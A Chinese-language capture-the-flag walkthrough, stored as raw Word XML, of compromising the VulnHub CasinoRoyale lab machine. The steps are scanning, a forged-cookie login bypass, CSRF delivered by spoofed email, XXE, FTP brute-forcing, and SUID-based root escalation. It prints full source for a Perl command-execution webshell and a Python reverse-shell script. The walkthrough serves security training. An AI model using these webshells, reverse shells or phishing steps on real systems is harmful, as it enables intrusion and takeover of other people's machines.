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CasinoRoyale靶机练习实践报告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300" w:lineRule="atLeast"/>
        <w:ind w:left="16" w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下载地址: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 w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="376" w:right="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7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5990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://drive.google.com/open?id=1FYP246L63zShV00wOckAQ5F5XJ4HkZ0L" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>https://drive.google.com/open?id=1FYP246L63zShV00wOckAQ5F5XJ4HkZ0L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7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 w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="376" w:right="0" w:hanging="360"/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1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7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5990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7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 w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="376" w:right="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7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5990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova.torrent" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova.torrent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7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005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "magnet:?xt=urn:btih:CBD296DC554D892D495864B66E335D2973192B59&amp;dn=CasinoRoyale.ova&amp;tr=http://tracker.vulnhub.com:6969/announce&amp;tr=udp://tracker.vulnhub.com:6969/announce&amp;tr=udp://tracker.openbittorrent.com:80/announce&amp;tr=udp://tracker.publicbt.com:80/announce&amp;tr=udp://tracker.istole.it:6969" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t> Magnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="005990"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>)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安装靶机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靶机是.ova文件，需要用VirtualBox打开，但我习惯于使用VMWare,因此修改靶机文件，使其适用于VMWare打开。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解压ova文件，得到.ovf文件和.vmdk文件。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79290" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="1651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rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="宋体" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="F7F7F7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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>夺旗步骤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第一步：IP扫描，端口扫描，定位靶机的IP地址未192.168.81.133。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58665" cy="1412875"/>
            <wp:effectExtent l="0" t="0" r="13335" b="15875"/>
            <wp:docPr id="33" name="图片 33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片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端口扫描，发现靶机开放端口21、25、80、8081。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620260" cy="2009140"/>
            <wp:effectExtent l="0" t="0" r="8890" b="10160"/>
            <wp:docPr id="34" name="图片 34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片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第二步：目录扫描、域名扫描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608830" cy="3347085"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="35" name="图片 35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片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对IP地址做目录爆破，发现5个可访问地址，逐个访问，发现一个需要用户口令的phpmyadmin地址，用常规口令爆破，失败。用nikto继续做域名发现。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82185" cy="3100070"/>
            <wp:effectExtent l="0" t="0" r="18415" b="5080"/>
            <wp:docPr id="36" name="图片 36" descr="图片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片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218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对扫描发现的地址逐个查看，未有直接可利用信息。注意nikto攻击提示了一个可能存在的安全问题，经过排查并没法发现可利用。但是有个在192.168.81.133：80/index.php地址有个提示信息，说要用域名访问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casino-royale.local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,不管有没有用，先把该映射关系添加到hosts中。对8081端口做同样的扫描，没有什么重要发现。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4699635"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="63" name="图片 6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捕获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89780" cy="1014730"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13970"/>
            <wp:docPr id="38" name="图片 38" descr="图片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片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我们在页面的底部发现该网站用了PokerMax Poker 0.13，去exploitdb中搜一下历史漏洞，查看相关漏洞文件6766.txt。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72660" cy="932815"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="39" name="图片 39" descr="图片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片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84420" cy="3632200"/>
            <wp:effectExtent l="0" t="0" r="11430" b="6350"/>
            <wp:docPr id="40" name="图片 40" descr="图片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片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访问对应configure.php地址，然后在浏览器的console中执行javascript:document.cookie=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ValidUserAdmin=admin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;再次访问configure.php，就可以绕过口令登陆，我们从浏览器中看到的请求报文如下图所示，带上了cookie--&gt;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ValidUserAdmin:admin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245" cy="612140"/>
            <wp:effectExtent l="0" t="0" r="14605" b="16510"/>
            <wp:docPr id="41" name="图片 41" descr="图片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片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再次访问configure.php界面如下图所示，获得用户名密码。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02860" cy="3103880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="42" name="图片 42" descr="图片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片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用改密码去登陆phpmyadmin界面失败。继续搜索其他标签页，在Manage Players中发现一个用户，查看他的具体信息。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25390" cy="2224405"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="43" name="图片 43" descr="图片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片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771775"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:docPr id="44" name="图片 44" descr="图片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片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示我们用casino-royale.local域名访问/vip-client-portfolios地址。我们发现该地址也有注册登陆接口，用之前获取的口令尝试，失败，继续查看其他内容，有一篇给新用户的博文写道要用已知的用户发送邮件给valenka@casino-royale.local，他会马上查看，而且会点击links。看起来没什么用，除非能发一个钓鱼邮件给他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621915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="64" name="图片 6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捕获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思考该网站是否使用了开源框架，该网站使用了Snowfox CMS，在exploitdb中搜索历史漏洞。果然发现了一个csrf漏洞，虽然不知道该网站使用的Snowfox CMS版本，还是试试。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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4636135" cy="958215"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13335"/>
            <wp:docPr id="65" name="图片 6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捕获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613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根据漏洞描述问题提示去利用，在本机搭建一个apache服务，并将利用html文件放在/var/www/html/目录下，在本地尝试是否可以通过http://ip/CasinoRoyal.html访问该页面。下图标记处exp中需要修改的地方。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1657985"/>
            <wp:effectExtent l="0" t="0" r="9525" b="18415"/>
            <wp:docPr id="47" name="图片 47" descr="图片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片3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我们在端口扫描时知道靶机上开放了smtp服务，通过命令行发送邮件给valenka@casino-royale.local，在邮件中添加网址http://ip/CasinoRoyal.html，当valenka点击该地址就会触发创建admin账户，注意，邮件的发送者必须伪造成已知用户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21810" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="46" name="图片 46" descr="图片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片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18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用新创建的admin账户登陆，逐个功能点查看，在账户里发现一个新的地址。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74235" cy="3508375"/>
            <wp:effectExtent l="0" t="0" r="12065" b="15875"/>
            <wp:docPr id="48" name="图片 48" descr="图片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片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423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877060"/>
            <wp:effectExtent l="0" t="0" r="6350" b="889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查看地址/ultra-access-view/main.php的页面源码，发现提示。正好是刚刚学习过的xxe漏洞，提示还说要用post方式传参。还有一句提示说ftp是弱口令。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5063490" cy="4276090"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10160"/>
            <wp:docPr id="51" name="图片 51" descr="图片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片3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349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利用hackbar攻击，失败。请教了大神才知道hackbar会对参数做一次url编码，导致后台不认。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194560"/>
            <wp:effectExtent l="0" t="0" r="8255" b="15240"/>
            <wp:docPr id="50" name="图片 50" descr="图片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片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直接在burp中利用，获取ftp的用户名。为什么在这里想获取口令，而不是直接命令执行获取flag。因为题目告诉我们flag在/root/flag/flag.sh中，通过网站的用户获取权限不够。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023745"/>
            <wp:effectExtent l="0" t="0" r="12065" b="14605"/>
            <wp:docPr id="52" name="图片 52" descr="图片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图片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我们发现ftpUserULTRA是ftp用户名，前面提示过ftp是弱口令，所以爆破咯。而且访问ftp的页面地址也给出来了，是/ultra-access-view。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492250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
            <wp:docPr id="53" name="图片 53" descr="图片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片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当然是ftp登陆上去查看一番。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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3803015" cy="3904615"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635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直接上传一个php木马，然后通过网页访问触发，提示550 permission deny；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上传一个perl木马，然后通过网页触发访问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记得要给脚本可执行权限，否则执行失败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Perl脚本还不能直接执行tcp来反弹shell,提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”apache can't access tty; job control turned off”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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4874260" cy="4142740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10160"/>
            <wp:docPr id="54" name="图片 54" descr="图片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图片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Perl脚本分享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#!/usr/bin/perl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# PerlKit-0.1 - http://www.t0s.org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# cmd.pl: Run commands on a webserver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use strict;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my ($cmd, %FORM);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$|=1;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print "Content-Type: text/html\r\n";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print "\r\n";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# Get parameters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%FORM = parse_parameters($ENV{'QUERY_STRING'});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if(defined $FORM{'cmd'})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$cmd = $FORM{'cmd'};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print '&lt;HTML&gt;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&lt;body&gt;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&lt;form action="" method="GET"&gt;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&lt;input type="text" name="cmd" size=45 value="' . $cmd . '"&gt;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&lt;input type="submit" value="Run"&gt;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&lt;/form&gt;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&lt;pre&gt;';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if(defined $FORM{'cmd'})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print "Results of '$cmd' execution:\n\n";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print "-"x80;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print "\n";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open(CMD, "($cmd) 2&gt;&amp;1 |") || print "Could not execute command";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while(&lt;CMD&gt;)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 print;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close(CMD);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print "-"x80;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print "\n";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print "&lt;/pre&gt;";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sub parse_parameters ($)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my %ret;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my $input = shift;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foreach my $pair (split('&amp;', $input))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 my ($var, $value) = split('=', $pair, 2);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 if($var)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   $value =~ s/\+/ /g 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   $value =~ s/%(..)/pack('c',hex($1))/eg;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   $ret{$var} = $value;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 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return %ret;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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="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none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>终于getShell了。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9070" cy="1612900"/>
            <wp:effectExtent l="0" t="0" r="17780" b="6350"/>
            <wp:docPr id="55" name="图片 55" descr="图片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片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权限不够，提权，linux内核提权失败。在各个目录下扫荡，发现关键目录/opt/casino-royale，逐个查看文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，在php-web-start.sh中看到了8081端口，访问看看。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43730" cy="1777365"/>
            <wp:effectExtent l="0" t="0" r="13970" b="13335"/>
            <wp:docPr id="56" name="图片 56" descr="图片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片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503420" cy="1572260"/>
            <wp:effectExtent l="0" t="0" r="11430" b="889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570730" cy="2230755"/>
            <wp:effectExtent l="0" t="0" r="1270" b="17145"/>
            <wp:docPr id="69" name="图片 6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捕获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073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右键查看源码，发现点击data collect按钮会触发collect.php执行，而该php文件会执行casino-data-collection.py。我们唯一能操作的文件就是该py文件，写一个python shell就可以获得用户le的shell，虽然还不是root用户的shell,试试也无妨。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当前shell竟然无法使用vim编辑器，发现大神一篇介绍shell的文章，醍醐灌顶。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.anquanke.com/post/id/86444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。直接升级netcat的方式尝试失败，使用socat的方式，在已有的shell中再次反弹shell。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5570220"/>
            <wp:effectExtent l="0" t="0" r="4445" b="11430"/>
            <wp:docPr id="57" name="图片 57" descr="图片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片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终于可以使用vim了，下面是python的反弹shell脚本内容。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socket,subprocess,os;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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);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s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0);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os.dup2(s.fileno(),1);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os.dup2(s.fileno(),2);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p=subprocess.call(["/bin/sh","-i"]);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在页面上点击按钮，获得le的shell。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971165"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="58" name="图片 58" descr="图片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图片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获取le的shell后，查看close2root.txt,出现一个网址，但是没有特别的内容。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继续查看其他文件，mi6_detect_test是elf格式，它是root所有，且设置了s位，执行看看，发现它调用了run.sh，而run.sh是le有权限改的，在该文件末尾打开一个shell,那就是root权限！！！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590165"/>
            <wp:effectExtent l="0" t="0" r="12700" b="635"/>
            <wp:docPr id="60" name="图片 60" descr="图片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片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881505"/>
            <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
            <wp:docPr id="61" name="图片 61" descr="图片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片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root权限get!!!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执行/root/flag/flag.sh,根据提示获取flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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303145"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="62" name="图片 62" descr="图片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图片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遇到网站务必要看是否使用框架，找框架漏洞，靶机涉及Poker和SnowFox两个框架漏洞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熟练掌握常见web漏洞利用手法。靶机涉及到xxe漏洞、文件上传漏洞、弱口令、csrf漏洞、不安全的cookie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储备好webshell等弹药库。靶机涉及python webshell、perl webshell、php webshell(没成功)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掌握shell提权的方式，如反弹shell变成可交互的shell,普通shell提权为root权限shell</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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5" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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 w:eastAsiaTheme="minor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7DF4344"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="87DF434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9D3A0CB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D3A0CB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23D4BFA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23D4BFA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50DDF775"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="50DDF775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432FE2"/>
    <w:rsid w:val="03614170"/>
    <w:rsid w:val="046551C7"/>
    <w:rsid w:val="049C4E68"/>
    <w:rsid w:val="04C138A2"/>
    <w:rsid w:val="05A35C12"/>
    <w:rsid w:val="05BA54F1"/>
    <w:rsid w:val="05EB414F"/>
    <w:rsid w:val="0625537A"/>
    <w:rsid w:val="062B66E8"/>
    <w:rsid w:val="06C82621"/>
    <w:rsid w:val="07035FB2"/>
    <w:rsid w:val="08736C5A"/>
    <w:rsid w:val="087F5010"/>
    <w:rsid w:val="08CC07E3"/>
    <w:rsid w:val="0AB15B9A"/>
    <w:rsid w:val="0BB93917"/>
    <w:rsid w:val="0BFB12CA"/>
    <w:rsid w:val="0CF82246"/>
    <w:rsid w:val="0D3E1ADC"/>
    <w:rsid w:val="0D40757B"/>
    <w:rsid w:val="0D59282B"/>
    <w:rsid w:val="0DD602E5"/>
    <w:rsid w:val="0E321234"/>
    <w:rsid w:val="0FA77346"/>
    <w:rsid w:val="0FD37938"/>
    <w:rsid w:val="11D36983"/>
    <w:rsid w:val="12C442ED"/>
    <w:rsid w:val="13702390"/>
    <w:rsid w:val="13995F6A"/>
    <w:rsid w:val="14295024"/>
    <w:rsid w:val="148A72AF"/>
    <w:rsid w:val="165B7A1D"/>
    <w:rsid w:val="17292819"/>
    <w:rsid w:val="18CB48FC"/>
    <w:rsid w:val="18F433ED"/>
    <w:rsid w:val="193D7E87"/>
    <w:rsid w:val="19903949"/>
    <w:rsid w:val="1A9F6C98"/>
    <w:rsid w:val="1AAC227E"/>
    <w:rsid w:val="1B575582"/>
    <w:rsid w:val="1B683278"/>
    <w:rsid w:val="1C302214"/>
    <w:rsid w:val="1C762A3F"/>
    <w:rsid w:val="1D546DC6"/>
    <w:rsid w:val="1E5A0F48"/>
    <w:rsid w:val="1F4C11BA"/>
    <w:rsid w:val="1F577CE3"/>
    <w:rsid w:val="1F6521A5"/>
    <w:rsid w:val="1FAE7494"/>
    <w:rsid w:val="1FC0736A"/>
    <w:rsid w:val="202D6672"/>
    <w:rsid w:val="21330791"/>
    <w:rsid w:val="21781760"/>
    <w:rsid w:val="224824AD"/>
    <w:rsid w:val="228D67DC"/>
    <w:rsid w:val="233825EF"/>
    <w:rsid w:val="245C0E51"/>
    <w:rsid w:val="24A904E7"/>
    <w:rsid w:val="24B8761F"/>
    <w:rsid w:val="257238DE"/>
    <w:rsid w:val="25F91AE9"/>
    <w:rsid w:val="26F04BB6"/>
    <w:rsid w:val="26F67988"/>
    <w:rsid w:val="2742100D"/>
    <w:rsid w:val="27D62EAF"/>
    <w:rsid w:val="282E012B"/>
    <w:rsid w:val="28681EA7"/>
    <w:rsid w:val="28EE7ECD"/>
    <w:rsid w:val="29456AFD"/>
    <w:rsid w:val="2A0B38C5"/>
    <w:rsid w:val="2BA417A5"/>
    <w:rsid w:val="2BB042D2"/>
    <w:rsid w:val="2BC85810"/>
    <w:rsid w:val="2DF32E59"/>
    <w:rsid w:val="2F2D1C4E"/>
    <w:rsid w:val="2FA84349"/>
    <w:rsid w:val="2FBB44B1"/>
    <w:rsid w:val="30E43F7D"/>
    <w:rsid w:val="31227C2F"/>
    <w:rsid w:val="313C6090"/>
    <w:rsid w:val="31781287"/>
    <w:rsid w:val="3180469B"/>
    <w:rsid w:val="31990AFF"/>
    <w:rsid w:val="31DB6735"/>
    <w:rsid w:val="327613F5"/>
    <w:rsid w:val="331C74EA"/>
    <w:rsid w:val="33BD5595"/>
    <w:rsid w:val="33C47375"/>
    <w:rsid w:val="33FC267C"/>
    <w:rsid w:val="34A042C4"/>
    <w:rsid w:val="35466265"/>
    <w:rsid w:val="355876EA"/>
    <w:rsid w:val="361B76FC"/>
    <w:rsid w:val="36487E0B"/>
    <w:rsid w:val="36C42B86"/>
    <w:rsid w:val="36E104E6"/>
    <w:rsid w:val="36E8747A"/>
    <w:rsid w:val="375F3EEE"/>
    <w:rsid w:val="39282C9A"/>
    <w:rsid w:val="39614C94"/>
    <w:rsid w:val="3998340F"/>
    <w:rsid w:val="39FE0538"/>
    <w:rsid w:val="3B913FCD"/>
    <w:rsid w:val="3C623342"/>
    <w:rsid w:val="3CEA6D6B"/>
    <w:rsid w:val="3D42330D"/>
    <w:rsid w:val="3E715E58"/>
    <w:rsid w:val="3E991A8F"/>
    <w:rsid w:val="3EEF1589"/>
    <w:rsid w:val="3F5B46C5"/>
    <w:rsid w:val="401F2C5E"/>
    <w:rsid w:val="41321DD5"/>
    <w:rsid w:val="43DB1BA6"/>
    <w:rsid w:val="43E10435"/>
    <w:rsid w:val="4453677F"/>
    <w:rsid w:val="446C44DB"/>
    <w:rsid w:val="44C459F5"/>
    <w:rsid w:val="44D14097"/>
    <w:rsid w:val="45133F6E"/>
    <w:rsid w:val="45977585"/>
    <w:rsid w:val="45B42EFD"/>
    <w:rsid w:val="46683546"/>
    <w:rsid w:val="47B97B9E"/>
    <w:rsid w:val="49750A83"/>
    <w:rsid w:val="49F110D6"/>
    <w:rsid w:val="4B8B0A72"/>
    <w:rsid w:val="4BCB58A0"/>
    <w:rsid w:val="4C4F27D5"/>
    <w:rsid w:val="4C7C15E0"/>
    <w:rsid w:val="4CF24594"/>
    <w:rsid w:val="4DD414F8"/>
    <w:rsid w:val="4F3039F2"/>
